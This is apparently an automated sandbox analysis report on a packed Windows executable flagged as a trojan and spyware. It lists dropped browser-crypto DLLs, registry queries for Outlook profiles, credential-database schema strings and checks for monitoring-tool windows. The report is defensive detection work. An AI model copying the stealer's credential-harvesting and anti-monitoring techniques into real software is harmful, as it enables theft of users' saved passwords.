Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801	0_2_00DDF801
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEE19D	0_2_00CEE19D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF116B	0_2_00DF116B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE92E0	0_2_00CE92E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C54292	0_2_00C54292
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1BA45	0_2_00C1BA45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE5BCF	0_2_00CE5BCF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA2342	0_2_00BA2342
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCC47C	0_2_00CCC47C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C30C00	0_2_00C30C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEAD5E	0_2_00CEAD5E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D89D23	0_2_00D89D23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE26CF	0_2_00CE26CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEFE47	0_2_00CEFE47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE77F7	0_2_00CE77F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEC744	0_2_00CEC744
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC4F15	0_2_00CC4F15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 124 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 009245C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 60 times

Source: file.exe, 00000000.00000002.2282802999.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: lyfkycld ZLIB complexity 0.9948454040733353

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00938680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00938680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00933720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00933720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JR4L6FUG.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2164170296.000000001D32B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150460552.000000001D338000.00000004.00000020.00020000.00000000.sdmp, JJDGCGHCGHCBFHJJKKJE.0.dr, FHJKKECFIECAKECAFBGC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2282337801.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1825280 > 1048576

Source: file.exe

Static PE information: Raw size of lyfkycld is bigger than: 0x100000 < 0x197600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2282718068.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.920000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lyfkycld:EW;wellcrkw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lyfkycld:EW;wellcrkw:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00939860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00939860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c8f5b should be: 0x1bdf0d

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: lyfkycld
Source: file.exe	Static PE information: section name: wellcrkw
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCA2E6 push 0AB40672h; mov dword ptr [esp], ecx	0_2_00DCA306
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCA2E6 push 6B41B312h; mov dword ptr [esp], ecx	0_2_00DCAC40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5E0DE push 7F389A8Ch; mov dword ptr [esp], ecx	0_2_00D5E11C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB1895 push 29E3CFE8h; mov dword ptr [esp], edi	0_2_00DB19A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB1895 push 61A8DAD0h; mov dword ptr [esp], edi	0_2_00DB19B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAD088 push ebx; mov dword ptr [esp], esi	0_2_00DAD0C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DAD088 push ebp; mov dword ptr [esp], eax	0_2_00DAD176
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC408F push ecx; mov dword ptr [esp], ebx	0_2_00DC40A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D100A6 push 0A826932h; mov dword ptr [esp], ecx	0_2_00D100ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFA0B6 push edi; mov dword ptr [esp], 3443D77Fh	0_2_00CFA23D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFA0B6 push ebp; mov dword ptr [esp], edi	0_2_00CFA248
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC805E push edi; mov dword ptr [esp], 3B7FD821h	0_2_00CC80B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC805E push 51924F14h; mov dword ptr [esp], edi	0_2_00CC8137
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0093B035 push ecx; ret	0_2_0093B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF04A push eax; mov dword ptr [esp], ebx	0_2_00FAF04E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF04A push ebp; mov dword ptr [esp], ecx	0_2_00FAF064
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF04A push edx; mov dword ptr [esp], esi	0_2_00FAF114
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF04A push ecx; mov dword ptr [esp], 0ADB6D22h	0_2_00FAF137
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF04A push edi; mov dword ptr [esp], 5127ACA2h	0_2_00FAF149
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAF04A push esi; mov dword ptr [esp], edi	0_2_00FAF157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5E867 push 1E79DBB6h; mov dword ptr [esp], eax	0_2_00D5E93B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB7864 push 6A67C856h; mov dword ptr [esp], ecx	0_2_00DB7912
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB7864 push 777EBB35h; mov dword ptr [esp], ecx	0_2_00DB799B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2F811 push esi; mov dword ptr [esp], edi	0_2_00D2F837
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2F811 push esi; mov dword ptr [esp], 1637750Ch	0_2_00D2F83B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801 push eax; mov dword ptr [esp], esi	0_2_00DDF82E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801 push 016E270Eh; mov dword ptr [esp], ecx	0_2_00DDF865
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801 push 5E6813BAh; mov dword ptr [esp], edi	0_2_00DDF8BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801 push esi; mov dword ptr [esp], ebp	0_2_00DDF8C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801 push ebx; mov dword ptr [esp], edx	0_2_00DDF8E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDF801 push 29F0188Bh; mov dword ptr [esp], edx	0_2_00DDF95B

Source: file.exe

Static PE information: section name: lyfkycld entropy: 7.954248999444363

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
